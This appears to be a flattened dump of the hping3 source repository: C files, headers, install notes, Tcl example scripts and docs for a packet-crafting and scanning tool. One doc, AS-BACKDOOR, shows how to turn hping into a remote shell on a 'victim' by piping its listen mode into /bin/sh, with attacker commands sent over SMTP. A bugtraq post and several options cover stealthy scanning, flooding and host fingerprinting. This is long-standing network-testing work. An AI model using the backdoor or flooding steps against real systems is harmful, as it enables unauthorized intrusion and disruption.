AGO_LIST_TERM {'\0',NULL,0,AGO_ENDOFLIST} 18 | 19 | /* The structure that defines an argument */ 20 | struct ago_optlist { 21 | char ao_short; 22 | char *ao_long; 23 | int ao_id; 24 | int ao_flags; 25 | }; 26 | 27 | extern char *ago_optarg; 28 | extern char *ago_optname; 29 | extern char ago_optchar; 30 | 31 | int antigetopt(int argc, char **argv, struct ago_optlist *list); 32 | void ago_gnu_error(char *pname, int error); 33 | int ago_set_exception(int except_nr, int (*tester)(void), char *msg); 34 | 35 | #endif /* __ANTIGETOPT_H */ 36 | -------------------------------------------------------------------------------- /RFCs/INDEX: -------------------------------------------------------------------------------- 1 | The ARS lib is useless without knowledge about TCP/IP. 2 | This are the RFCs you need to learn what you need, or to 3 | refresh your memory. 4 | 5 | FILENAME RFC TITLE 6 | -------- --------- 7 | 8 | rfc768.txt User Datagram Protocol 9 | rfc791.txt INTERNET PROTOCOL 10 | rfc792.txt INTERNET CONTROL MESSAGE PROTOCOL 11 | rfc793.txt TRANSMISSION CONTROL PROTOCOL 12 | rfc826.txt An Ethernet Address Resolution Protocol 13 | rfc950.txt Internet Standard Subnetting Procedure 14 | rfc1063.txt IP MTU Discovery Options 15 | rfc1072.txt TCP Extensions for Long-Delay Paths 16 | rfc1112.txt Host Extensions for IP Multicasting 17 | rfc1122.txt Requirements for Internet Hosts -- Communication Layers 18 | rfc1323.txt TCP Extensions for High Performance 19 | rfc1812.txt Requirements for IP Version 4 Routers 20 | rfc2018.txt TCP Selective Acknowledgment Options 21 | rfc2236.txt Internet Group Management Protocol, Version 2 22 | rfc2460.txt Internet Protocol, Version 6 (IPv6) 23 | 24 | Note that: 25 | 26 | rfc950 Contains information about ICMP extensions 27 | rfc1072 Contains information about TCP options 28 | rfc1112 Contains information about the IGMP protocol 29 | -------------------------------------------------------------------------------- /relid.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: relid.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* FIXME: maybe it's better to avoid division per seq_diff and 12 | at least add an option to switch on/off this feature */ 13 | 14 | /* $Id: relid.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | int relativize_id(int seqnum, int *ip_id) 20 | { 21 | int seq_diff, backup_id; 22 | static int last_seq = 0, last_id = -1; 23 | 24 | backup_id = *ip_id; 25 | 26 | if (last_id == -1) { 27 | last_id = *ip_id; 28 | last_seq = seqnum; 29 | } 30 | else 31 | { 32 | if ( (seq_diff=(seqnum-last_seq)) > 0) 33 | { 34 | if (last_id > *ip_id) /* rew */ 35 | *ip_id = ((65535-last_id) 36 | + *ip_id)/seq_diff; 37 | else 38 | *ip_id = (*ip_id-last_id) 39 | /seq_diff; 40 | last_id = backup_id; 41 | last_seq = seqnum; 42 | return TRUE; 43 | } else { 44 | out_of_sequence_pkt++; 45 | } 46 | } 47 | return FALSE; 48 | } 49 | -------------------------------------------------------------------------------- /binding.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: binding.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:46 MET 1999$ 8 | * $rev: 11$ 9 | */ 10 | 11 | /* $Id: binding.c,v 1.2 2003/09/01 00:15:22 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #include "hping2.h" 19 | #include "globals.h" 20 | 21 | void inc_destparm(int sid) 22 | { 23 | static long sec = 0; 24 | static long usec = 0; 25 | int *p; 26 | int errno_save = errno; 27 | 28 | switch (ctrlzbind) { 29 | case BIND_DPORT: 30 | p = &dst_port; 31 | break; 32 | case BIND_TTL: 33 | p = &src_ttl; 34 | break; 35 | default: 36 | printf("error binding ctrl+z\n"); 37 | /* errno = errno_save; */ 38 | return; 39 | } 40 | 41 | if ( (time(NULL) == sec) && ((get_usec() - usec) < 200000) ) { 42 | if (*p > 0) 43 | (*p)-=2; 44 | if (*p < 0) 45 | *p=0; 46 | } else 47 | (*p)++; 48 | 49 | printf("\b\b\b\b\b\b\b\b\b"); 50 | printf("%d: ", *p); 51 | fflush(stdout); 52 | 53 | sec = time(NULL); 54 | usec = get_usec(); 55 | signal(SIGTSTP, inc_destparm); 56 | errno = errno_save; 57 | } 58 | -------------------------------------------------------------------------------- /docs/AS-BACKDOOR: -------------------------------------------------------------------------------- 1 | hping can be used as a backdoor. Just try the -9 (--listen) option 2 | and put in pipe with /bin/sh: 3 | 4 | Put hping in listen mode in the victim host. 5 | 6 | victim# hping -I eth0 -9 mysign | /bin/sh 7 | 8 | Every packet that contain "mysign" will be processed by hping, 9 | all the bytes that follows "mysign" in the packet will be dumped 10 | to the standard output, so for example I'll able to exec commands 11 | using all types of protocols. Just for example I can use the smtpd 12 | to exec 'ls' in the victim. 13 | 14 | evil$ telnet victim 25 15 | 16 | Trying 192.168.1.1... 17 | Connected to nano (192.168.1.1). 18 | Escape character is '^]'. 19 | 220 nano.marmoc.net ESMTP Sendmail 20 | mysignls; 21 | 22 | on the victim you will see: 23 | 24 | victim# hping -I eth0 -9 mysign | /bin/sh 25 | hping2 listen mode 26 | bin cdrom etc home local-home mnt root tmp var 27 | boot dev export lib lost+found proc sbin usr 28 | : command not found 29 | 30 | As you can see I used 'ls;' since otherwise the shell will receive 31 | just ls^M. The ";" force the command execution (at least with bash and zsh, 32 | check your shell for more information). 33 | 34 | This works with all kind of valid not-filtered IP packets, the higher 35 | level protocl does not matter. 36 | 37 | antirez 38 | -------------------------------------------------------------------------------- /gethostname.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: gethostname.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: gethostname.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | char *get_hostname(char* addr) 22 | { 23 | static char answer[1024]; 24 | static char lastreq[1024] = {'\0'}; /* last request */ 25 | struct hostent *he; 26 | struct in_addr naddr; 27 | static char *last_answerp = NULL; 28 | 29 | printf(" get hostname..."); fflush(stdout); 30 | printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b" 31 | " " 32 | "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"); 33 | 34 | if (!strcmp(addr, lastreq)) 35 | return last_answerp; 36 | 37 | strncpy(lastreq, addr, 1024); 38 | inet_aton(addr, &naddr); 39 | he = gethostbyaddr((char*)&naddr, 4, AF_INET); 40 | 41 | if (he == NULL) { 42 | last_answerp = NULL; 43 | return NULL; 44 | } 45 | 46 | strncpy(answer, he->h_name, 1024); 47 | last_answerp = answer; 48 | 49 | return answer; 50 | } 51 | 52 | -------------------------------------------------------------------------------- /sendhcmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendhcmp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 4$ 9 | */ 10 | 11 | /* $Id: sendhcmp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include /* SIGALARM macro */ 17 | 18 | #include "hping2.h" 19 | #include "globals.h" 20 | 21 | #define MUST_BE_UNREACHED 0 22 | 23 | void send_hcmp(__u8 type, __u32 arg) 24 | { 25 | static struct hcmphdr hcmph; /* static because we export this */ 26 | /* to data_handler() */ 27 | 28 | data_size = signlen + sizeof(struct hcmphdr); 29 | 30 | /* build hcmp header */ 31 | memset(&hcmph, 0, sizeof(hcmph)); 32 | hcmph.type = type; 33 | switch (type) 34 | { 35 | case HCMP_RESTART: 36 | hcmph.typedep.seqnum = htons((__u16) arg); 37 | break; 38 | case HCMP_SOURCE_QUENCH: 39 | case HCMP_SOURCE_STIRUP: 40 | hcmph.typedep.usec = htonl(arg); 41 | break; 42 | default: 43 | assert(MUST_BE_UNREACHED); 44 | } 45 | 46 | /* use hcmphdr_p to transmit hcmph to data_handler() */ 47 | hcmphdr_p = &hcmph; 48 | kill(getpid(), SIGALRM); /* send hcmp */ 49 | 50 | return; 51 | } 52 | -------------------------------------------------------------------------------- /statistics.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: statistics.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: statistics.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void print_statistics(int signal_id) 20 | { 21 | unsigned int lossrate; 22 | 23 | close_pcap(); 24 | if (recv_pkt > 0) 25 | lossrate = 100 - ((recv_pkt*100)/sent_pkt); 26 | else 27 | if (!sent_pkt) 28 | lossrate = 0; 29 | else 30 | lossrate = 100; 31 | 32 | fprintf(stderr, "\n--- %s hping statistic ---\n", targetname); 33 | fprintf(stderr, "%d packets tramitted, %d packets received, " 34 | "%d%% packet loss\n", sent_pkt, recv_pkt, lossrate); 35 | if (out_of_sequence_pkt) 36 | fprintf(stderr, "%d out of sequence packets received\n", 37 | out_of_sequence_pkt); 38 | fprintf(stderr, "round-trip min/avg/max = %.1f/%.1f/%.1f ms\n", 39 | rtt_min, rtt_avg, rtt_max); 40 | 41 | /* manage exit code */ 42 | if (opt_tcpexitcode) 43 | { 44 | exit(tcp_exitcode); 45 | } 46 | else 47 | { 48 | if (recv_pkt) 49 | exit(0); 50 | else 51 | exit(1); 52 | } 53 | }; 54 | -------------------------------------------------------------------------------- /docs/MORE-FUN-WITH-IPID: -------------------------------------------------------------------------------- 1 | Posted to bugtraq mailing list (20 Nov 1999): 2 | 3 | --- 4 | Hi, 5 | 6 | some little new ideas about IP ID issue: 7 | 8 | The first is about linux firewalling: since it increase IP ID global counter 9 | even if an outgoing packet will be filtered we are able, for example, to 10 | scan UDP ports even if ICMP type 3 output is DENY, and in general it is possibleto know when TCP/IP stack reply a packet even if the reply is dropped. 11 | I think (but not tested) that this is true for almost all firewalls. 12 | 13 | The second issue concern the ability to uncover firewall rules. For example 14 | it is travial to know if host A filter packets from the IP X.Y.Z.W monitoring 15 | IP ID incresing of host A or host with X.Y.Z.W address (this changes if we are 16 | interested to know input or output rules) and sending packets that suppose 17 | some reply. Also this is related with the ability to scan the ports of hosts 18 | that drop all packets with a source different than host.trusted.com. 19 | There are others stuff like this but they are only different faces of the 20 | same concepts. 21 | 22 | Some people thinks that this kind of attacks isn't a "real world" attacks, 23 | I'm strongly interested to know what's bugtraq readers opinion (IMO this 24 | kind of attacks are feasible and usefull for an attacker. For exaple the 25 | ability to scan the ports with only spoofed packets and the ability to 26 | guess remote hosts traffic are a lot real). 27 | 28 | ciao, 29 | antirez 30 | -------------------------------------------------------------------------------- /resolve.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: resolve.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: resolve.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | /* On error -1 is returned, on success 0 */ 23 | int resolve_addr(struct sockaddr * addr, char *hostname) 24 | { 25 | struct sockaddr_in *address; 26 | struct hostent *host; 27 | 28 | address = (struct sockaddr_in *)addr; 29 | 30 | memset(address, 0, sizeof(struct sockaddr_in)); 31 | address->sin_family = AF_INET; 32 | address->sin_addr.s_addr = inet_addr(hostname); 33 | 34 | if ( (int)address->sin_addr.s_addr == -1) { 35 | host = gethostbyname(hostname); 36 | if (host) { 37 | memcpy(&address->sin_addr, host->h_addr, 38 | host->h_length); 39 | return 0; 40 | } else { 41 | return -1; 42 | } 43 | } 44 | return 0; 45 | } 46 | 47 | /* Like resolve_addr but exit on error */ 48 | void resolve(struct sockaddr *addr, char *hostname) 49 | { 50 | if (resolve_addr(addr, hostname) == -1) { 51 | fprintf(stderr, "Unable to resolve '%s'\n", hostname); 52 | exit(1); 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /if_promisc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: if_promisc.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: if_promisc.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | int if_promisc_on(int s) 25 | { 26 | struct ifreq ifr; 27 | 28 | strlcpy(ifr.ifr_name, ifname, IFNAMSIZ); 29 | if ( ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { 30 | perror("[if_prommisc_on] ioctl(SIOCGIFFLAGS)"); 31 | return -1; 32 | } 33 | 34 | if (!(ifr.ifr_flags & IFF_PROMISC)) { 35 | ifr.ifr_flags |= IFF_PROMISC; 36 | if ( ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { 37 | perror("[if_promisc_on] ioctl(SIOCSIFFLAGS)"); 38 | return -1; 39 | } 40 | } 41 | return 0; 42 | } 43 | 44 | int if_promisc_off(int s) 45 | { 46 | struct ifreq ifr; 47 | 48 | strlcpy(ifr.ifr_name, ifname, IFNAMSIZ); 49 | if ( ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { 50 | perror("[if_promisc_off] ioctl(SIOCGIFFLAGS)"); 51 | return -1; 52 | } 53 | 54 | if (ifr.ifr_flags & IFF_PROMISC) { 55 | ifr.ifr_flags ^= IFF_PROMISC; 56 | if ( ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { 57 | perror("[if_promisc_off] ioctl(SIOCSIFFLAGS)"); 58 | return -1; 59 | } 60 | } 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /INSTALL: -------------------------------------------------------------------------------- 1 | You can compile hping3 at least under: 2 | 3 | Linux 4 | OpenBSD 5 | FreeBSD 6 | NetBSD 7 | Solaris 8 | 9 | But hping3 is beta, for now it was mostly tested only in Linux, 10 | this should change soon now that the first beta is out. 11 | 12 | Note that starting from hping3 libpcap should be used 13 | with all the kind of systems, including Linux. 14 | 15 | Linux 16 | ----- 17 | 18 | please, follows this steps: 19 | 20 | $ ./configure (first try ./configure --help) 21 | $ vi Makefile (optional) 22 | $ make 23 | $ su 24 | # make install 25 | 26 | FreeBSD, OpenBSD, NetBSD 27 | ------------------------ 28 | 29 | You will need the libpcap and the gmake utility installed on your system. 30 | 31 | $ ./configure 32 | $ gmake 33 | $ su (or calife) 34 | # gmake install 35 | 36 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 37 | NOTE: You should take care about your net/bpf.h file installing on 38 | BSD systems (specially with OpenBSD). If your original bpf.h was 39 | overwritten with the libpcap one probably hping will not work 40 | with over some interface. 41 | 42 | For example if you use the libpcap bpf.h on OpenBSD hping will 43 | not work over PPP interfaces. 44 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 45 | 46 | Solaris 47 | ------- 48 | 49 | $ export CC="gcc" 50 | $ ./configure 51 | $ gmake 52 | $ su 53 | # gmake install 54 | 55 | ALL 56 | --- 57 | 58 | To setuid hping3 is like to open the port to script kiddies 59 | for now. Don't do it in any real multiuser and otherwise 60 | security-sensitive system. 61 | 62 | antirez 63 | -------------------------------------------------------------------------------- /adbuf.h: -------------------------------------------------------------------------------- 1 | /* adbuf.h - header file for adbuf.c 2 | * 3 | * Copyright(C) 2001-2002 Salvatore Sanfilippo 4 | * All rights reserved. 5 | * See the LICENSE file for COPYRIGHT and PERMISSION notice */ 6 | 7 | /* $Id: adbuf.h,v 1.1.1.1 2003/08/31 17:24:00 antirez Exp $ */ 8 | 9 | #ifndef _ADBUF_H 10 | #define _ADBUF_H 11 | 12 | #include 13 | 14 | struct adbuf { 15 | char *buf; 16 | size_t size; /* total buffer size */ 17 | size_t left; /* unused buffer size */ 18 | /* the size of data stored is just size-left */ 19 | }; 20 | 21 | #define ADBUF_INCR 256 /* note that this MUST BE >= 1 */ 22 | #define adbuf_used(b) ((b)->size - (b)->left) 23 | #define adbuf_ptr(b) ((b)->buf) 24 | 25 | /* Rawly create an adbuf object. 's' is supposed to be some heap 26 | * memory already allocated, with some nul-term string inside */ 27 | #define adbuf_from_heapstring(b,s) \ 28 | do { b->buf = s; b->left = 0; b->size = strlen(s); } while(0) 29 | 30 | int adbuf_init(struct adbuf *b); 31 | void adbuf_free(struct adbuf *b); 32 | int adbuf_reset(struct adbuf *b); 33 | int adbuf_add(struct adbuf *b, void *data, size_t len); 34 | int adbuf_addchar(struct adbuf *b, int c); 35 | int adbuf_strcat(struct adbuf *b, char *string); 36 | int adbuf_cat(struct adbuf *a, struct adbuf *b); 37 | int adbuf_cut(struct adbuf *b, size_t count); 38 | int adbuf_ltrim(struct adbuf *b, size_t count); 39 | int adbuf_rtrim(struct adbuf *b, size_t count); 40 | int adbuf_add_long(struct adbuf *b, long l); 41 | int adbuf_add_ulong(struct adbuf *b, unsigned long l); 42 | int adbuf_clone(struct adbuf *src, struct adbuf *dst); 43 | int adbuf_printf(struct adbuf *dst, const char *fmt, ...); 44 | 45 | #endif /* _ADBUF_H */ 46 | -------------------------------------------------------------------------------- /AUTHORS: -------------------------------------------------------------------------------- 1 | Lead developer and maintainer: 2 | 3 | Salvatore Sanfilippo 4 | 5 | Regular contributors: 6 | 7 | Nicolas Jombart 8 | Denis Ducamp 9 | Yann Berthier 10 | Stephane Aubert 11 | 12 | Other contributors: 13 | 14 | Brieuc Jeunhomme 15 | Mika 16 | Alfonso De Gregorio 17 | Francesco Potorti` 18 | Daniel Ginsburg 19 | Steve Bleazard 20 | 21 | 22 | Also thanks to the following people for testing, bug reports, ideas, 23 | minor patches, documentation fixes: 24 | 25 | Valeriano Bedeschi 26 | Lorenzo Cavallaro 27 | awgn roofing 28 | Darren Reed 29 | Lance Spitzner 30 | Stefano Brandimarte 31 | "roy kozzer" 32 | Jason Lunz 33 | Domenico Andreoli 34 | Gian-Luca Dei Rossi 35 | Marco D'Itri 36 | Rui Miguel Barbosa Machado 37 | David Bar 38 | David Coppa 39 | Shachar Shemesh 40 | Brieuc Jeunhomme 41 | Hans-Joachim Knobloch 42 | Olivier Warin 43 | 44 | -------------------------------------------------------------------------------- 45 | Note: if you aren't in this list for an oversight, please inform me. 46 | -------------------------------------------------------------------------------- /lib/passivets.htcl: -------------------------------------------------------------------------------- 1 | # Try to discover hosts's uptime in a passive-fashion (i.e. locking 2 | # at the traffic). Maybe it's a bit buggy, but just an exaple. 3 | 4 | source "hpingstdlib.htcl" 5 | 6 | while {1} { 7 | set packets [hping recv ppp0 -1] 8 | set p [lindex $packets 0] 9 | set srcaddr [GetIpSaddr $p] 10 | if {[string length [array names ignore $srcaddr]]} { 11 | continue 12 | } 13 | set tsval [GetTcpTimestampVal $p] 14 | if {$tsval != {}} { 15 | puts "$srcaddr: $tsval" 16 | #puts "$srcaddr: $tsval ([clock clicks -milliseconds])" 17 | if {[string length [array names lastval $srcaddr]]} { 18 | set xms [expr [clock clicks -milliseconds] - $lastms($srcaddr)] 19 | if {$xms >= 1000} { 20 | set xval [expr abs($tsval-$lastval($srcaddr))] 21 | set hz [expr ($xval/$xms.0)*1000] 22 | set hz [expr round($hz)] 23 | puts $hz 24 | #puts "$srcaddr: XVAL=$xval XMS=$xms HZ=$hz" 25 | #set lastval($srcaddr) $tsval 26 | #set lastms($srcaddr) [clock clicks -milliseconds] 27 | if {($hz%10) == 0 && $hz != 0} { 28 | set upseconds [expr $tsval / $hz] 29 | set days [expr $upseconds/(3600*24)] 30 | set upseconds [expr $upseconds%(3600*24)] 31 | set hours [expr $upseconds/3600] 32 | set upseconds [expr $upseconds % 3600] 33 | set minutes [expr $upseconds/60] 34 | set upseconds [expr $upseconds % 60] 35 | set seconds $upseconds 36 | puts "[hping resolve -ptr $srcaddr] ($srcaddr) UPTIME=$days days, $hours hours, $minutes minutes, $seconds seconds" 37 | set ignore($srcaddr) yes 38 | } 39 | } 40 | } else { 41 | set lastval($srcaddr) $tsval 42 | set lastms($srcaddr) [clock clicks -milliseconds] 43 | } 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /lib/ping.htcl: -------------------------------------------------------------------------------- 1 | #hping softrealtime 1 2 | source "hpingstdlib.htcl" 3 | 4 | if {$argc != 1} { 5 | puts "usage: ping.htcl hostname" 6 | exit 1 7 | } 8 | 9 | set target [lindex $argv 0] 10 | set targetip [hping resolve $target] 11 | 12 | puts "PING $target ($targetip): 56 data bytes" 13 | 14 | set outifaddr [hping outifa $targetip] 15 | set outifname [outifname $targetip] 16 | hping setfilter $outifname "icmp and host $targetip" 17 | 18 | set icmp_id [expr int(rand()*65536)] 19 | set icmp_seq 0 20 | array set icmp_rtt_tab {} 21 | 22 | proc send_icmp {} { 23 | after 1000 send_icmp 24 | global outifaddr targetip icmp_id icmp_seq icmp_rtt_tab 25 | append icmp "ip(saddr=$outifaddr,daddr=$targetip,ttl=255)+" 26 | append icmp "icmp(type=8,code=0,id=$icmp_id,seq=$icmp_seq)+" 27 | append icmp "data(str=[string repeat X 28])" 28 | set icmp_rtt_tab($icmp_seq) [clock clicks -milliseconds] 29 | hping send $icmp 30 | #puts "! $icmp_seq" 31 | incr icmp_seq 32 | } 33 | 34 | proc recv_icmp {} { 35 | global outifname outifaddr targetip icmp_id icmp_rtt_tab 36 | set packets [hping recv $outifname 0 1000] 37 | #puts [llength $packets] 38 | foreach p $packets { 39 | if {[GetIpSaddr $p] != $targetip} continue 40 | if {[GetIpDaddr $p] != $outifaddr} continue 41 | if {[GetIcmpType $p] != 0} continue 42 | if {[GetIcmpCode $p] != 0} continue 43 | if {[GetIcmpId $p] != $icmp_id} continue 44 | 45 | set seq [GetIcmpSeq $p] 46 | set ttl [GetIpTtl $p] 47 | set rtt [expr [clock clicks -milliseconds] - $icmp_rtt_tab($seq)] 48 | puts "xxx bytes from [GetIpSaddr $p]: icmp_seq=$seq ttl=$ttl time=$rtt.0 ms" 49 | } 50 | after 10 recv_icmp 51 | } 52 | 53 | hping recv $outifname 0 54 | 55 | after 10 send_icmp 56 | after idle recv_icmp 57 | vwait forver 58 | 59 | # vim: filetype=tcl 60 | -------------------------------------------------------------------------------- /byteorder.c: -------------------------------------------------------------------------------- 1 | #if 0 2 | # 3 | # Compile with: 4 | # $sh byteorder.c 5 | # 6 | cc byteorder.c -o byteorder || exit 1 7 | echo successfully compiled 8 | exit 9 | #endif /* 0 */ 10 | 11 | /* Coypright (C) 1999-2003 Salvatore Sanfilippo */ 12 | 13 | /* 14 | * 0.1 first version 15 | * 0.2 add Strchr, so it's possibile remove string.h 16 | * 0.3 more portable thx to Pancrazio De Mauro 'TrantIT'!!! 17 | * 0.4 better debug output 18 | */ 19 | 20 | /* $Id: byteorder.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 21 | 22 | #include 23 | 24 | char *Strchr(char *s, char c) 25 | { 26 | while(*s) 27 | if (*s++ == c) 28 | return s; 29 | 30 | return (char*) 0; 31 | } 32 | 33 | int main(int argc, char **argv) 34 | { 35 | unsigned int test = 1; 36 | unsigned char *x; 37 | int macro = 0, debug = 0, help = 0, j; 38 | 39 | for (j = 1; j < argc; j++) { 40 | if (Strchr(argv[j], 'm')) macro = 1; 41 | if (Strchr(argv[j], 'd')) debug = 1; 42 | if (Strchr(argv[j], 'h')) help = 1; 43 | } 44 | 45 | if (help) { 46 | printf( "-m macro output\n" 47 | "-d debug\n" 48 | "-h help\n"); 49 | return 0; 50 | } 51 | 52 | x = (unsigned char*) &test; 53 | 54 | if (*x == 0x00) { 55 | if (macro) 56 | printf("__BIG_ENDIAN_BITFIELD\n"); 57 | else 58 | printf("big endian\n"); 59 | } 60 | else if (*x == 0x01) { 61 | if (macro) 62 | printf("__LITTLE_ENDIAN_BITFIELD\n"); 63 | else 64 | printf("little endian\n"); 65 | } else { 66 | printf("\nWARNING!!! byteorder exception\n\n"); 67 | debug = 1; 68 | } 69 | 70 | if (debug) { 71 | printf("sizeof(unsigned int) = %d\n", 72 | (int)sizeof(unsigned int)); 73 | printf("unsigned int test = 1;\n"); 74 | printf("in memory as: "); 75 | for (j = 0; j < sizeof(unsigned int); j++) 76 | printf("%02x ", x[j]); 77 | printf("\n"); 78 | } 79 | return 0; 80 | } 81 | -------------------------------------------------------------------------------- /in.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2000,2001 Salvatore Sanfilippo */ 2 | 3 | #ifndef ARS_IPPROTO_IP 4 | 5 | #define ARS_IPPROTO_IP 0 /* Dummy protocol for TCP. */ 6 | #define ARS_IPPROTO_HOPOPTS 0 /* IPv6 Hop-by-Hop options. */ 7 | #define ARS_IPPROTO_ICMP 1 /* Internet Control Message Protocol. */ 8 | #define ARS_IPPROTO_IGMP 2 /* Internet Group Management Protocol. */ 9 | #define ARS_IPPROTO_IPIP 4 /* IPIP tunnels (older KA9Q tunnels use 94).*/ 10 | #define ARS_IPPROTO_TCP 6 /* Transmission Control Protocol. */ 11 | #define ARS_IPPROTO_EGP 8 /* Exterior Gateway Protocol. */ 12 | #define ARS_IPPROTO_IGRP 9 /* Cisco(R)'s IGRP Routing Portocol. */ 13 | #define ARS_IPPROTO_PUP 12 /* PUP protocol. */ 14 | #define ARS_IPPROTO_UDP 17 /* User Datagram Protocol. */ 15 | #define ARS_IPPROTO_IDP 22 /* XNS IDP protocol. */ 16 | #define ARS_IPPROTO_TP 29 /* SO Transport Protocol Class 4. */ 17 | #define ARS_IPPROTO_IPV6 41 /* IPv6 header. */ 18 | #define ARS_IPPROTO_ROUTING 43 /* IPv6 routing header. */ 19 | #define ARS_IPPROTO_FRAGMENT 44 /* IPv6 fragmentation header. */ 20 | #define ARS_IPPROTO_RSVP 46 /* Reservation Protocol. */ 21 | #define ARS_IPPROTO_GRE 47 /* General Routing Encapsulation. */ 22 | #define ARS_IPPROTO_ESP 50 /* encapsulating security payload. */ 23 | #define ARS_IPPROTO_AH 51 /* authentication header. */ 24 | #define ARS_IPPROTO_ICMPV6 58 /* ICMPv6. */ 25 | #define ARS_IPPROTO_NONE 59 /* IPv6 no next header. */ 26 | #define ARS_IPPROTO_DSTOPTS 60 /* IPv6 destination options. */ 27 | #define ARS_IPPROTO_MTP 92 /* Multicast Transport Protocol. */ 28 | #define ARS_IPPROTO_ENCAP 98 /* Encapsulation Header. */ 29 | #define ARS_IPPROTO_PIM 103 /* Protocol Independent Multicast. */ 30 | #define ARS_IPPROTO_COMP 108 /* Compression Header Protocol. */ 31 | #define ARS_IPPROTO_RAW 255 /* Raw IP packets. */ 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /NEWS: -------------------------------------------------------------------------------- 1 | Read the README file to know about the new features in general. 2 | 3 | ------ hping3 alpha2 ------- 4 | 5 | Two new features for the command line interface. 6 | 7 | 1) Using the --beep option hping will produce a beep for every matching 8 | packet received (not for ICMP errors). 9 | 10 | 2) The --flood option to send packets as fast as possible. This 11 | is much faster than "-i u1", because it's actually an endless 12 | loop and in this mode hping will not care to read/show replies 13 | at all. 14 | 15 | ------ hping3 alpha1 ------- 16 | 17 | Read the docs/API.txt for information about scripting capabilties. 18 | 19 | Check the libs directory for examples of hping scripts. 20 | 21 | Try the --scan option in the command line to see the port-scanner features. 22 | 23 | Example of the --scan option usage: 24 | 25 | # hping3 --scan known 1.2.3.4 -S 26 | 27 | Scanning 1.2.3.4 (1.2.3.4), port known 28 | 245 ports to scan, use -V to see all the replies 29 | +----+-----------+---------+---+-----+-----+-----+ 30 | |port| serv name | flags |ttl| id | win | len | 31 | +----+-----------+---------+---+-----+-----+-----+ 32 | 9 discard : .S..A... 64 0 32767 44 33 | 13 daytime : .S..A... 64 0 32767 44 34 | 21 ftp : .S..A... 64 0 32767 44 35 | 22 ssh : .S..A... 64 0 32767 44 36 | 25 smtp : .S..A... 64 0 32767 44 37 | 37 time : .S..A... 64 0 32767 44 38 | 80 www : .S..A... 64 0 32767 44 39 | 111 sunrpc : .S..A... 64 0 32767 44 40 | 113 auth : .S..A... 64 0 32767 44 41 | 631 ipp : .S..A... 64 0 32767 44 42 | 